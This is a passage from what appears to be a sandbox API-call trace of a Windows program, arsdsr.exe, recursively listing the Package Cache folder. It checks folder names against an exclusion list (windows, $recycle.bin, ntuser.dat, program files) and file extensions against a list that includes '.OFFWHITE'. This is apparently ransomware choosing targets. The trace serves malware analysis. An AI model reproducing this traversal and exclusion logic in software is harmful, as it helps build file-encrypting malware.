returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0148.430] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\" [0148.430] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\" [0148.430] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" [0148.430] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.431] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.431] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.431] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.431] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.431] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.431] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.431] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\" [0148.431] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0148.431] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\" [0148.431] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\" [0148.431] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" [0148.432] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.432] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.432] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.433] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.433] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.433] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="...") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="windows") returned -1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$recycle.bin") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="rsa") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ntuser.dat") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="programdata") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="appdata") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="program files") returned 1 [0148.433] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="program files (x86)") returned 1 [0148.433] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\" [0148.433] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0148.433] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" [0148.433] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" [0148.433] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0148.433] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.434] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.434] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.434] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.434] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.434] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e8b00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd15e8b00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd15e8b00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x13babb, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.434] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.434] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" [0148.434] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0148.434] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.434] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.434] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.434] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.434] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.434] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0148.434] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb17b200, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfb17b200, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfb17b200, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="..") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="...") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="windows") returned -1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$recycle.bin") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="rsa") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ntuser.dat") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="programdata") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="appdata") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="program files") returned 1 [0148.435] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="program files (x86)") returned 1 [0148.435] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\" [0148.435] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0148.435] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.435] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.435] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.435] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.436] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.436] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.436] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.436] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.436] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb17b200, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfb17b200, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfb17b200, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.436] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.436] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0148.436] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.436] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.436] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.436] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2=".") returned 1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="..") returned 1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="...") returned 1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="windows") returned -1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="$recycle.bin") returned 1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="rsa") returned -1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="ntuser.dat") returned -1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="programdata") returned -1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="appdata") returned -1 [0148.436] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="program files") returned -1 [0148.437] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="program files (x86)") returned -1 [0148.437] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.437] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0148.437] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\" [0148.437] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\" [0148.437] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" [0148.437] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.438] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.438] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.438] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.438] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.438] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.438] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.438] lstrcmpiW 